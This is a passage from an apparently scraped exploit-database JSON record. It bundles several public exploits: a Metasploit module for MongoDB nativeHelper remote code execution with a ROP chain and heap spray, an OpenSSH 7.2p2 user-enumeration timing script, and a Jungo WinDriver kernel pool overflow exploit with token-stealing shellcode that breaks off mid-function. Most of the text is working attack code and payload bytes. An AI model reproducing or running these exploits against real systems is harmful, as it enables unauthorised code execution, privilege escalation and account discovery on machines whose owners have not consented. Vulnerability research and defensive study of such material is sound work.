we_can_make_pool_holes(): \nprint \"(+) made the pool holes!\" \nprint \"(+) allocating shellcode...\" \nif we_can_alloc_shellcode(): \nprint \"(+) allocated the shellcode!\" \nprint \"(+) triggering pool overflow...\" \nif we_can_trigger_the_pool_overflow(): \nprint \"(+) elevating privileges!\" \ntrigger_lpe() \n \nif __name__ == '__main__': \nmain() \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144046/jungowindriver-overflow.txt"}, {"lastseen": "2016-12-05T22:23:29", "bulletinFamily": "exploit", "description": "", "modified": "2016-07-18T00:00:00", "published": "2016-07-18T00:00:00", "href": "https://packetstormsecurity.com/files/137942/OpenSSHD-7.2p2-User-Enumeration.html", "id": "PACKETSTORM:137942", "type": "packetstorm", "title": "OpenSSHD 7.2p2 User Enumeration", "sourceData": "`-------------------------------------------------------------------- \nUser Enumeration using Open SSHD (<=Latest version). \n------------------------------------------------------------------- \n \nAbstract: \n----------- \nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash. \n \nCVE-ID \n--------- \nCVE-2016-6210 \n \nTested versions \n-------------------- \nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well). \n \nFix \n----------------- \nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet). \n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion). \n \nDetails \n---------------- \nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm. \nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \nresponse time from the server for non-existing users. \n \nSample code: \n---------------- \nimport paramiko \nimport time \nuser=raw_input(\"user: \") \np='A'*25000 \nssh = paramiko.SSHClient() \nstarttime=time.clock() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \ntry: \nssh.connect('127.0.0.1', username=user, \npassword=p) \nexcept: \nendtime=time.clock() \ntotal=endtime-starttime \nprint(total) \n \n(Valid users will result in higher total time). \n \n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user... \n \n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \npackets of the server, since this will eliminate any network delays on the way. \n \nEddie Harari \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/137942/openssh-enumerate.txt"}, {"lastseen": "2016-12-05T22:15:30", "bulletinFamily": "exploit", "description": "", "modified": "2013-04-02T00:00:00", "published": "2013-04-02T00:00:00", "href": "https://packetstormsecurity.com/files/121045/MongoDB-nativeHelper.apply-Remote-Code-Execution.html", "id": "PACKETSTORM:121045", "type": "packetstorm", "title": "MongoDB nativeHelper.apply Remote Code Execution", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# web site for more information on licensing and terms of use. \n# http://metasploit.com/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = NormalRanking \n \ninclude Msf::Exploit::Remote::Tcp \n \ndef initialize(info={}) \nsuper(update_info(info, \n'Name' => 'MongoDB nativeHelper.apply Remote Code Execution', \n'Description' => %q{ \nThis module exploit a the nativeHelper feature from spiderMonkey which allows to \nto control execution by calling it wit specially crafted arguments. This module \nhas been tested successfully on MongoDB 2.2.3 on Ubuntu 10.04 and Debian Squeeze. \n}, \n'Author' => \n[ \n'agix' # @agixid # Vulnerability discovery and Metasploit module \n], \n'References' => \n[ \n[ 'CVE', '2013-1892' ], \n[ 'OSVDB', '91632' ], \n[ 'BID', '58695' ], \n[ 'URL', 'http://blog.scrt.ch/2013/03/24/mongodb-0-day-ssji-to-rce/' ] \n], \n'Platform' => 'linux', \n'Targets' => \n[ \n[ 'Linux - mongod 2.2.3 - 32bits', \n{ \n'Arch' => ARCH_X86, \n'mmap' => [ \n0x0816f768, # mmap64@plt # from mongod \n0x08666d07, # add esp, 0x14 / pop ebx / pop ebp / ret # from mongod \n0x31337000, \n0x00002000, \n0x00000007, \n0x00000031, \n0xffffffff, \n0x00000000, \n0x00000000, \n0x0816e4c8, # memcpy@plt # from mongod \n0x31337000, \n0x31337000, \n0x0c0b0000, \n0x00002000 \n], \n'ret' => 0x08055a70, # ret # from mongod \n'gadget1' => 0x0836e204, # mov eax,DWORD PTR [eax] / call DWORD PTR [eax+0x1c] \n# These gadgets need to be composed with bytes < 0x80 \n'gadget2' => 0x08457158, # xchg esp,eax / add esp,0x4 / pop ebx / pop ebp / ret <== this gadget must xchg esp,eax and then increment ESP \n'gadget3' => 0x08351826, # add esp,0x20 / pop esi / pop edi / pop ebp <== this gadget placed before gadget2 increment ESP to escape gadget2 \n'gadget4' => 0x08055a6c, # pop eax / ret \n'gadget5' => 0x08457158 # xchg esp,eax \n} \n] \n], \n'DefaultTarget' => 0, \n'DisclosureDate' => 'Mar 24 2013', \n'License' => MSF_LICENSE \n)) \n \nregister_options( \n[ \nOpt::RPORT(27017), \nOptString.new('DB', [ true, \"Database to use\", \"admin\"]), \nOptString.new('COLLECTION', [ false, \"Collection to use (it must to exist). Better to let empty\", \"\"]), \nOptString.new('USERNAME', [ false, \"Login to use\", \"\"]), \nOptString.new('PASSWORD', [ false, \"Password to use\", \"\"]) \n], self.class) \nend \n \ndef exploit \nbegin \nconnect \nif require_auth? \nprint_status(\"Mongo server #{datastore['RHOST']} use authentication...\") \nif !datastore['USERNAME'] || !datastore['PASSWORD'] \ndisconnect \nfail_with(Exploit::Failure::BadConfig, \"USERNAME and PASSWORD must be provided\") \nend \nif do_login==0 \ndisconnect \nfail_with(Exploit::Failure::NoAccess, \"Authentication failed\") \nend \nelse \nprint_good(\"Mongo server #{datastore['RHOST']} doesn't use authentication\") \nend \n \nif datastore['COLLECTION'] && datastore['COLLECTION'] != \"\" \ncollection = datastore['COLLECTION'] \nelse \ncollection = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz') \nif read_only?(collection) \ndisconnect \nfail_with(Exploit::Failure::BadConfig, \"#{datastore['USERNAME']} has read only access, please provide an existent collection\") \nelse \nprint_good(\"New document created in collection #{collection}\") \nend \nend \n \nprint_status(\"Let's exploit, heap spray could take some time...\") \nmy_target = target \nshellcode = Rex::Text.to_unescape(payload.encoded) \nmmap = my_target['mmap'].pack(\"V*\") \nret = [my_target['ret']].pack(\"V*\") \ngadget1 = \"0x#{my_target['gadget1'].to_s(16)}\" \ngadget2 = Rex::Text.to_hex([my_target['gadget2']].pack(\"V\")) \ngadget3 = Rex::Text.to_hex([my_target['gadget3']].pack(\"V\")) \ngadget4 = Rex::Text.to_hex([my_target['gadget4']].pack(\"V\")) \ngadget5 = Rex::Text.to_hex([my_target['gadget5']].pack(\"V\")) \n \nshellcode_var=\"a\"+Rex::Text.rand_text_hex(4) \nsizechunk_var=\"b\"+Rex::Text.rand_text_hex(4) \nchunk_var=\"c\"+Rex::Text.rand_text_hex(4) \ni_var=\"d\"+Rex::Text.rand_text_hex(4) \narray_var=\"e\"+Rex::Text.rand_text_hex(4) \n \nropchain_var=\"f\"+Rex::Text.rand_text_hex(4) \nchunk2_var=\"g\"+Rex::Text.rand_text_hex(4) \narray2_var=\"h\"+Rex::Text.rand_text_hex(4) \n \n# nopsled + shellcode heapspray \npayload_js = shellcode_var+'=unescape(\"'+shellcode+'\");' \npayload_js << sizechunk_var+'=0x1000;' \npayload_js << chunk_var+'=\"\";' \npayload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk_var+'+=unescape(\"%u9090%u9090\"); } ' \npayload_js << chunk_var+'='+chunk_var+'.substring(0,('+sizechunk_var+'-'+shellcode_var+'.length));' \npayload_js << array_var+'=new Array();' \npayload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array_var+'['+i_var+']='+chunk_var+'+'+shellcode_var+'; } ' \n \n# retchain + ropchain heapspray \npayload_js << ropchain_var+'=unescape(\"'+Rex::Text.to_unescape(mmap)+'\");' \npayload_js << chunk2_var+'=\"\";' \npayload_js << 'for('+i_var+'=0;'+i_var+'<'+sizechunk_var+';'+i_var+'++){ '+chunk2_var+'+=unescape(\"'+Rex::Text.to_unescape(ret)+'\"); } ' \npayload_js << chunk2_var+'='+chunk2_var+'.substring(0,('+sizechunk_var+'-'+ropchain_var+'.length));' \npayload_js << array2_var+'=new Array();' \npayload_js << 'for('+i_var+'=0;'+i_var+'<25000;'+i_var+'++){ '+array2_var+'['+i_var+']='+chunk2_var+'+'+ropchain_var+'; } ' \n \n# Trigger and first ropchain \npayload_js << 'nativeHelper.apply({\"x\" : '+gadget1+'}, ' \npayload_js << '[\"A\"+\"'+gadget3+'\"+\"'+Rex::Text.rand_text_hex(12)+'\"+\"'+gadget2+'\"+\"'+Rex::Text.rand_text_hex(28)+'\"+\"'+gadget4+'\"+\"\\\\x20\\\\x20\\\\x20\\\\x20\"+\"'+gadget5+'\"]);' \n \nrequest_id = Rex::Text.rand_text(4) \n \npacket = request_id #requestID \npacket << \"\\xff\\xff\\xff\\xff\" #responseTo \npacket << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY) \npacket << \"\\x00\\x00\\x00\\x00\" #flags \npacket << datastore['DB']+\".\"+collection+\"\\x00\" #fullCollectionName (db.collection) \npacket << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0) \npacket << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1) \n \nwhere = \"\\x02\\x24\\x77\\x68\\x65\\x72\\x65\\x00\" \nwhere << [payload_js.length+4].pack(\"L\") \nwhere << payload_js+\"\\x00\" \n \nwhere.insert(0, [where.length + 4].pack(\"L\")) \n \npacket += where \npacket.insert(0, [packet.length + 4].pack(\"L\")) \n \nsock.put(packet) \n \ndisconnect \nrescue ::Exception => e \nfail_with(Exploit::Failure::Unreachable, \"Unable to connect\") \nend \nend \n \ndef require_auth? \nrequest_id = Rex::Text.rand_text(4) \npacket = \"\\x3f\\x00\\x00\\x00\" #messageLength (63) \npacket << request_id #requestID \npacket << \"\\xff\\xff\\xff\\xff\" #responseTo \npacket << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY) \npacket << \"\\x00\\x00\\x00\\x00\" #flags \npacket << \"\\x61\\x64\\x6d\\x69\\x6e\\x2e\\x24\\x63\\x6d\\x64\\x00\" #fullCollectionName (admin.$cmd) \npacket << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0) \npacket << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1) \n#query ({\"listDatabases\"=>1}) \npacket << \"\\x18\\x00\\x00\\x00\\x10\\x6c\\x69\\x73\\x74\\x44\\x61\\x74\\x61\\x62\\x61\\x73\\x65\\x73\\x00\\x01\\x00\\x00\\x00\\x00\" \n \nsock.put(packet) \nresponse = sock.get_once \n \nhave_auth_error?(response) \nend \n \ndef read_only?(collection) \nrequest_id = Rex::Text.rand_text(4) \n_id = \"\\x07_id\\x00\"+Rex::Text.rand_text(12)+\"\\x02\" \nkey = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\" \nvalue = Rex::Text.rand_text(4, nil, 'abcdefghijklmnopqrstuvwxyz')+\"\\x00\" \n \ninsert = _id+key+[value.length].pack(\"L\")+value+\"\\x00\" \n \npacket = [insert.length+24+datastore['DB'].length+6].pack(\"L\") #messageLength \npacket << request_id #requestID \npacket << \"\\xff\\xff\\xff\\xff\" #responseTo \npacket << \"\\xd2\\x07\\x00\\x00\" #opCode (2002 Insert Document) \npacket << \"\\x00\\x00\\x00\\x00\" #flags \npacket << datastore['DB'] + \".\" + collection + \"\\x00\" #fullCollectionName (DB.collection) \npacket << [insert.length+4].pack(\"L\") \npacket << insert \n \nsock.put(packet) \n \nrequest_id = Rex::Text.rand_text(4) \n \npacket = [datastore['DB'].length + 61].pack(\"L\") #messageLength (66) \npacket << request_id #requestID \npacket << \"\\xff\\xff\\xff\\xff\" #responseTo \npacket << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 Query) \npacket << \"\\x00\\x00\\x00\\x00\" #flags \npacket << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd) \npacket << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0) \npacket << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1) \npacket << \"\\x1b\\x00\\x00\\x00\" \npacket << \"\\x01\\x67\\x65\\x74\\x6c\\x61\\x73\\x74\\x65\\x72\\x72\\x6f\\x72\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\" \n \nsock.put(packet) \n \nresponse = sock.get_once \nhave_auth_error?(response) \nend \n \ndef do_login \nprint_status(\"Trying #{datastore['USERNAME']}/#{datastore['PASSWORD']} on #{datastore['DB']} database\") \nnonce = get_nonce \nstatus = auth(nonce) \nreturn status \nend \n \ndef auth(nonce) \nrequest_id = Rex::Text.rand_text(4) \npacket = request_id #requestID \npacket << \"\\xff\\xff\\xff\\xff\" #responseTo \npacket << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY) \npacket << \"\\x00\\x00\\x00\\x00\" #flags \npacket << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd) \npacket << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0) \npacket << \"\\xff\\xff\\xff\\xff\" #numberToReturn (1) \n \n#{\"authenticate\"=>1.0, \"user\"=>\"root\", \"nonce\"=>\"94e963f5b7c35146\", \"key\"=>\"61829b88ee2f8b95ce789214d1d4f175\"} \ndocument = \"\\x01\\x61\\x75\\x74\\x68\\x65\\x6e\\x74\\x69\\x63\\x61\\x74\\x65\" \ndocument << \"\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x02\\x75\\x73\\x65\\x72\\x00\" \ndocument << [datastore['USERNAME'].length + 1].pack(\"L\") # +1 due null byte termination \ndocument << datastore['USERNAME'] + \"\\x00\" \ndocument << \"\\x02\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x11\\x00\\x00\\x00\" \ndocument << nonce + \"\\x00\" \ndocument << \"\\x02\\x6b\\x65\\x79\\x00\\x21\\x00\\x00\\x00\" \ndocument << Rex::Text.md5(nonce + datastore['USERNAME'] + Rex::Text.md5(datastore['USERNAME'] + \":mongo:\" + datastore['PASSWORD'])) + \"\\x00\" \ndocument << \"\\x00\" \n#Calculate document length \ndocument.insert(0, [document.length + 4].pack(\"L\")) \n \npacket += document \n \n#Calculate messageLength \npacket.insert(0, [(packet.length + 4)].pack(\"L\")) #messageLength \nsock.put(packet) \nresponse = sock.get_once \nif have_auth_error?(response) \nprint_error(\"Bad login or DB\") \nreturn 0 \nelse \nprint_good(\"Successful login on DB #{datastore['db']}\") \nreturn 1 \nend \n \n \nend \n \ndef get_nonce \nrequest_id = Rex::Text.rand_text(4) \npacket = [datastore['DB'].length + 57].pack(\"L\") #messageLength (57+DB.length) \npacket << request_id #requestID \npacket << \"\\xff\\xff\\xff\\xff\" #responseTo \npacket << \"\\xd4\\x07\\x00\\x00\" #opCode (2004 OP_QUERY) \npacket << \"\\x00\\x00\\x00\\x00\" #flags \npacket << datastore['DB'] + \".$cmd\" + \"\\x00\" #fullCollectionName (DB.$cmd) \npacket << \"\\x00\\x00\\x00\\x00\" #numberToSkip (0) \npacket << \"\\x01\\x00\\x00\\x00\" #numberToReturn (1) \n#query {\"getnonce\"=>1.0} \npacket << \"\\x17\\x00\\x00\\x00\\x01\\x67\\x65\\x74\\x6e\\x6f\\x6e\\x63\\x65\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xf0\\x3f\\x00\" \n \nsock.put(packet) \nresponse = sock.get_once \ndocuments = response[36..1024] \n#{\"nonce\"=>\"f785bb0ea5edb3ff\", \"ok\"=>1.0} \nnonce = documents[15..30] \nend \n \ndef have_auth_error?(response) \n#Response header 36 bytes long \ndocuments = response[36..1024] \n#{\"errmsg\"=>\"auth fails\", \"ok\"=>0.0} \n#{\"errmsg\"=>\"need to login\", \"ok\"=>0.0} \nif documents.include?('errmsg') || documents.include?('unauthorized') \nreturn true \nelse \nreturn false \nend \nend \nend \n`\n", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/121045/mongod_native_helper.rb.txt"}], "exploitdb": [{"lastseen": "2017-09-06T20:06:13", "bulletinFamily": "exploit", "description": "Jungo DriverWizard WinDriver - Kernel Pool Overflow. CVE-2017-14153. Local exploit for Windows platform", "modified": "2017-09-06T00:00:00", "published": "2017-09-06T00:00:00", "id": "EDB-ID:42624", "href": "https://www.exploit-db.com/exploits/42624/", "type": "exploitdb", "title": "Jungo DriverWizard WinDriver - Kernel Pool Overflow", "sourceData": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nJungo DriverWizard WinDriver Kernel Pool Overflow Vulnerability\r\n\r\nDownload: http://www.jungo.com/st/products/windriver/\r\nFile: WD1240.EXE\r\nSha1: 3527cc974ec885166f0d96f6aedc8e542bb66cba\r\nDriver: windrvr1240.sys\r\nSha1: 0f212075d86ef7e859c1941f8e5b9e7a6f2558ad\r\nCVE: CVE-2017-14153\r\nAuthor: Steven Seeley (mr_me) of Source Incite\r\nAffected: <= v12.4.0\r\nThanks: b33f, ryujin and sickness\r\nAnalysis: http://srcincite.io/blog/2017/09/06/sharks-in-the-pool-mixed-object-exploitation-in-the-windows-kernel-pool.html\r\n\r\nSummary:\r\n========\r\n\r\nThis vulnerability allows local attackers to escalate privileges on vulnerable installations of Jungo WinDriver. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. \r\n\r\nThe specific flaw exists within the processing of IOCTL 0x953824b7 by the windrvr1240 kernel driver. The issue lies in the failure to properly validate user-supplied data which can result in a kernel pool overflow. An attacker can leverage this vulnerability to execute arbitrary code under the context of kernel.\r\n\r\nTimeline:\r\n=========\r\n\r\n2017-08-22 \u2013 Verified and sent to Jungo via sales@/first@/security@/info@jungo.com\r\n2017-08-25 \u2013 No response from Jungo and two bounced emails\r\n2017-08-26 \u2013 Attempted a follow up with the vendor via website chat\r\n2017-08-26 \u2013 No response via the website chat\r\n2017-09-03 \u2013 Recieved an email from a Jungo representative stating that they are \"looking into it\"\r\n2017-09-03 \u2013 Requested a timeframe for patch development and warned of possible 0day release\r\n2017-09-06 \u2013 No response from Jungo\r\n2017-09-06 \u2013 Public 0day release of advisory\r\n\r\nExample:\r\n========\r\n\r\nC:\\Users\\Guest\\Desktop>icacls poc.py\r\npoc.py NT AUTHORITY\\Authenticated Users:(I)(F)\r\n NT AUTHORITY\\SYSTEM:(I)(F)\r\n BUILTIN\\Administrators:(I)(F)\r\n BUILTIN\\Users:(I)(F)\r\n Mandatory Label\\Low Mandatory Level:(I)(NW)\r\n\r\nSuccessfully processed 1 files; Failed processing 0 files\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\ndebugee\\guest\r\n\r\nC:\\Users\\Guest\\Desktop>poc.py\r\n\r\n --[ Jungo DriverWizard WinDriver Kernel Pool Overflow EoP exploit ]\r\n Steven Seeley (mr_me) of Source Incite\r\n\r\n(+) spraying pool with mixed objects...\r\n(+) sprayed the pool!\r\n(+) making pool holes...\r\n(+) made the pool holes!\r\n(+) allocating shellcode...\r\n(+) allocated the shellcode!\r\n(+) triggering pool overflow...\r\n(+) allocating pool overflow input buffer\r\n(+) elevating privileges!\r\nMicrosoft Windows [Version 6.1.7601]\r\nCopyright (c) 2009 Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Users\\Guest\\Desktop>whoami\r\nnt authority\\system\r\n\r\nC:\\Users\\Guest\\Desktop>\r\n\"\"\"\r\nfrom ctypes import *\r\nfrom ctypes.wintypes import *\r\nimport struct, sys, os, time\r\nfrom platform import release, architecture\r\n\r\nntdll = windll.ntdll\r\nkernel32 = windll.kernel32\r\nMEM_COMMIT = 0x00001000\r\nMEM_RESERVE = 0x00002000\r\nPAGE_EXECUTE_READWRITE = 0x00000040\r\nSTATUS_SUCCESS = 0x0\r\nSTATUS_INFO_LENGTH_MISMATCH = 0xC0000004\r\nSTATUS_INVALID_HANDLE = 0xC0000008\r\nSystemExtendedHandleInformation = 64\r\n\r\nclass LSA_UNICODE_STRING(Structure):\r\n \"\"\"Represent the LSA_UNICODE_STRING on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Length\", USHORT),\r\n (\"MaximumLength\", USHORT),\r\n (\"Buffer\", LPWSTR),\r\n ]\r\n\r\nclass SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):\r\n \"\"\"Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Object\", c_void_p),\r\n (\"UniqueProcessId\", ULONG),\r\n (\"HandleValue\", ULONG),\r\n (\"GrantedAccess\", ULONG),\r\n (\"CreatorBackTraceIndex\", USHORT),\r\n (\"ObjectTypeIndex\", USHORT),\r\n (\"HandleAttributes\", ULONG),\r\n (\"Reserved\", ULONG),\r\n ]\r\n \r\nclass SYSTEM_HANDLE_INFORMATION_EX(Structure):\r\n \"\"\"Represent the SYSTEM_HANDLE_INFORMATION on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"NumberOfHandles\", ULONG),\r\n (\"Reserved\", ULONG),\r\n (\"Handles\", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),\r\n ]\r\n\r\nclass PUBLIC_OBJECT_TYPE_INFORMATION(Structure):\r\n \"\"\"Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll.\"\"\"\r\n _fields_ = [\r\n (\"Name\", LSA_UNICODE_STRING),\r\n (\"Reserved\", ULONG * 22),\r\n ]\r\n\r\nclass PROCESSENTRY32(Structure):\r\n _fields_ = [\r\n (\"dwSize\", c_ulong),\r\n (\"cntUsage\", c_ulong),\r\n (\"th32ProcessID\", c_ulong),\r\n (\"th32DefaultHeapID\", c_int),\r\n (\"th32ModuleID\", c_ulong),\r\n (\"cntThreads\", c_ulong),\r\n (\"th32ParentProcessID\", c_ulong),\r\n (\"pcPriClassBase\", c_long),\r\n (\"dwFlags\", c_ulong),\r\n (\"szExeFile\", c_wchar * MAX_PATH)\r\n ]\r\n\r\nProcess32First = kernel32.Process32FirstW\r\nProcess32Next = kernel32.Process32NextW\r\n\r\ndef signed_to_unsigned(signed):\r\n \"\"\"\r\n Convert signed to unsigned integer.\r\n \"\"\"\r\n unsigned, = struct.unpack (\"L\", struct.pack (\"l\", signed))\r\n return unsigned\r\n \r\ndef get_type_info(handle):\r\n \"\"\"\r\n Get the handle type information to find our sprayed objects.\r\n \"\"\"\r\n public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()\r\n size = DWORD(sizeof(public_object_type_information))\r\n while True:\r\n result = signed_to_unsigned(\r\n ntdll.NtQueryObject(\r\n handle, 2, byref(public_object_type_information), size, None))\r\n if result == STATUS_SUCCESS:\r\n return public_object_type_information.Name.Buffer\r\n elif result == STATUS_INFO_LENGTH_MISMATCH:\r\n size = DWORD(size.value * 4)\r\n resize(public_object_type_information, size.value)\r\n elif result == STATUS_INVALID_HANDLE:\r\n return None\r\n else:\r\n raise x_file_handles(\"NtQueryObject.2\", hex (result))\r\n\r\ndef get_handles():\r\n \"\"\"\r\n Return all the processes handles in the system at the time.\r\n Can be done from LI (Low Integrity) level on Windows 7 x86.\r\n \"\"\"\r\n system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()\r\n size = DWORD (sizeof (system_handle_information))\r\n while True:\r\n result = ntdll.NtQuerySystemInformation(\r\n SystemExtendedHandleInformation,\r\n byref(system_handle_information),\r\n size,\r\n byref(size)\r\n )\r\n result = signed_to_unsigned(result)\r\n if result == STATUS_SUCCESS:\r\n break\r\n elif result == STATUS_INFO_LENGTH_MISMATCH:\r\n size = DWORD(size.value * 4)\r\n resize(system_handle_information, size.value)\r\n else:\r\n raise x_file_handles(\"NtQuerySystemInformation\", hex(result))\r\n\r\n pHandles = cast(\r\n system_handle_information.Handles,\r\n POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \\\r\n system_handle_information.NumberOfHandles)\r\n )\r\n for handle in pHandles.contents:\r\n yield handle.UniqueProcessId, handle.HandleValue, handle.Object\r\n\r\ndef we_can_alloc_shellcode():\r\n \"\"\" \r\n This function allocates the shellcode @ the null page making\r\n sure the new OkayToCloseProcedure pointer points to shellcode.\r\n \"\"\"\r\n baseadd = c_int(0x00000004)\r\n null_size = c_int(0x1000)\r\n\r\n tokenstealing = (\r\n \"\\x33\\xC0\\x64\\x8B\\x80\\x24\\x01\\x00\\x00\\x8B\\x40\\x50\\x8B\\xC8\\x8B\\x80\"\r\n \"\\xB8\\x00\\x00\\x00\\x2D\\xB8\\x00\\x00\\x00\\x83\\xB8\\xB4\\x00\\x00\\x00\\x04\"\r\n \"\\x75\\xEC\\x8B\\x90\\xF8\\x00\\x00\\x00\\x89\\x91\\xF8\\x00\\x00\\x00\\xC2\\x10\"\r\n \"\\x00\" )\r\n \r\n OkayToCloseProcedure = struct.pack(\"<L\", 0x00000078)\r\n sc = \"\\x42\" * 0x70 + OkayToCloseProcedure\r\n\r\n # first we restore our smashed TypeIndex\r\n sc += \"\\x83\\xC6\\x0c\" # add esi, 0c\r\n sc += \"\\xc7\\x06\\x0a\\x00\\x08\\x00\" # mov [esi], 8000a\r\n sc += \"\\x83\\xee\\x0c\" # sub esi, 0c \r\n sc += tokenstealing\r\n sc += \"\\x90\" * (0x400-len(sc))\r\n ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \r\n POINTER(c_int), c_int, c_int]\r\n dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \r\n byref(null_size), \r\n MEM_RESERVE|MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE)\r\n if dwStatus != STATUS_SUCCESS:\r\n print \"(-) error while allocating the null paged memory: %s\" % dwStatus\r\n return False\r\n written = c_ulong()\r\n write = kernel32.WriteProcessMemory(0xffffffff, 0x00000004, sc, 0x400, byref(written))\r\n if write == 0:\r\n print \"(-) error while writing our junk to the null paged memory: %s\" % write\r\n return False\r\n return True\r\n\r\ndef we_can_spray():\r\n \"\"\"\r\n Spray the Kernel Pool with IoCompletionReserve and Event Objects. \r\n The IoCompletionReserve object is 0x60 and Event object is 0x40 bytes in length.\r\n These are allocated from the Nonpaged kernel pool.\r\n \"\"\"\r\n handles = []\r\n IO_COMPLETION_OBJECT = 1\r\n for i in range(0, 25000):\r\n handles.append(windll.kernel32.CreateEventA(0,0,0,0))\r\n hHandle = HANDLE(0)\r\n handles.append(ntdll.NtAllocateReserveObject(byref(hHandle), 0x0, IO_COMPLETION_OBJECT))\r\n\r\n # could do with some better validation\r\n if len(handles) > 0:\r\n return True\r\n return False\r\n\r\ndef alloc_pool_overflow_buffer(base, input_size):\r\n \"\"\"\r\n Craft our special buffer to trigger the overflow.\r\n \"\"\"\r\n print \"(+) allocating pool overflow input buffer\"\r\n baseadd = c_int(base)\r\n size = c_int(input_size)\r\n input = \"\\x41\" * 0x18 # offset to size\r\n input += struct.pack(\"<I\", 0x0000008d) # controlled size (this triggers the overflow)\r\n input += \"\\x42\" * (0x90-len(input)) # padding to survive bsod\r\n input += struct.pack(\"<I\", 0x00000000) # use a NULL dword for sub_4196CA\r\n input += \"\\x43\" * ((0x460-0x8)-len(input)) # fill our pool buffer\r\n \r\n # repair the allocated chunk header...\r\n input += struct.pack(\"<I\", 0x040c008c) # _POOL_HEADER\r\n input += struct.pack(\"<I\", 0xef436f49) # _POOL_HEADER (PoolTag)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO\r\n input += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (PointerCount)\r\n input += struct.pack(\"<I\", 0x00000001) # _OBJECT_HEADER (HandleCount)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (Lock)\r\n input += struct.pack(\"<I\", 0x00080000) # _OBJECT_HEADER (TypeIndex)\r\n input += struct.pack(\"<I\", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)\r\n \r\n # filler\r\n input += \"\\x44\" * (input_size-len(input))\r\n ntdll.NtAllocateVirtualMemory.argtypes = [c_int, POINTER(c_int), c_ulong, \r\n POINTER(c_int), c_int, c_int]\r\n dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffff, byref(baseadd), 0x0, \r\n byref(size), \r\n MEM_RESERVE|MEM_COMMIT,\r\n PAGE_EXECUTE_READWRITE)\r\n if dwStatus != STATUS_SUCCESS:\r\n print \"(-) error while allocating memory: %s\" % hex(dwStatus + 0xffffffff)\r\n return False\r\n written = c_ulong()\r\n write = kernel32.WriteProcessMemory(0xffffffff, base, input, len(input), byref(written))\r\n if write == 0:\r\n print \"(-) error while writing our input buffer memory: %s\" % write\r\n return False\r\n return True\r\n\r\ndef we_can_trigger_the_pool_overflow():\r\n \"\"\"\r\n This triggers the pool overflow vulnerability using a buffer of size 0x460.\r\n \"\"\"\r\n GENERIC_READ = 0x80000000\r\n 